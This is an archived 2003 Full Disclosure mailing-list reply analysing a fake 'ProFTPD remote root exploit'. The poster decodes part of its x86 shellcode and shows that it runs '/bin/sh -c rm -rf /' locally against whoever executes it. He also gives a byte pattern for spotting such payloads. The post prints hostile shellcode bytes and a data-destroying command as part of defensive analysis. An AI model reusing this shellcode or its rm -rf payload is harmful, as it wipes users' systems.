Full Disclosure mailing list archives
Re: ProFTPD-1.2.9rc2 remote root exploit
From: Philipp Buehler <pb+full-disclosure () mlsub buehler net>
Date: Fri, 24 Oct 2003 17:34:53 +0200
On 24/10/2003, GARCIA Lionel <lionel.garcia () airbus com> wrote To full-disclosure () lists netsys com:
---> void(*sleep)()=(void*)sc;sleep(5); <------- Hummm :-\
obscure the obvious :)
The shellcode seems to be locally launched. Anybody to "decrypt" the shellcode ?
Well, not "fully", since this already gives enough clues: \x31\xc0 xorl %eax,%eax \x50 pushl %eax \x68\x66\x20\x2f\x58 pushl $0x66202f58 !"f /X" \x68\x6d\x20\x2d\x72 pushl $0x6d202d72 !"m -r" \x68\x2d\x63\x58\x72 pushl $0x2d635872 !"rcXr" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x41\x41\x41\x41 pushl $0x41414141 !"AAAA" \x68\x2f\x73\x68\x43 pushl $0x2f736843 !"/shC" \x68\x2f\x62\x69\x6e pushl $0x2f62696e !"/bin" \x31\xc0 xorl %eax,%eax Then some "creative hopping" to connect this to an "/bin/sh rm -rf /" If shellcode matches 0x72, 0x6d, 0x2d and 0x66 .. always be "alerted" :> 'LOVE' in the air ... :) ciao -- Philipp Buehler, aka fips | <double-p> When the horse dies, get off. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: ProFTPD-1.2.9rc2 remote root exploit, (continued)
- Re: ProFTPD-1.2.9rc2 remote root exploit Simon Kirby (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit qobaiashi (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit upb (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Jedi/Sector One (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete kang (Oct 24)
- Re: ProFTPD-1.2.9rc2 localhost delete dilema (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Cael Abal (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Rob Lewis (Oct 24)
- ProFTPD-1.2.9rc2 remote root exploit Jean-Kevin Grosnakeur (Oct 24)
- RE: ProFTPD-1.2.9rc2 remote root exploit GARCIA Lionel (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Philipp Buehler (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Larry W. Cashdollar (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit zero (Oct 24)
- Re: ProFTPD-1.2.9rc2 remote root exploit Philipp Buehler (Oct 24)
- RE: ProFTPD-1.2.9rc2 remote root exploit amebix (Oct 24)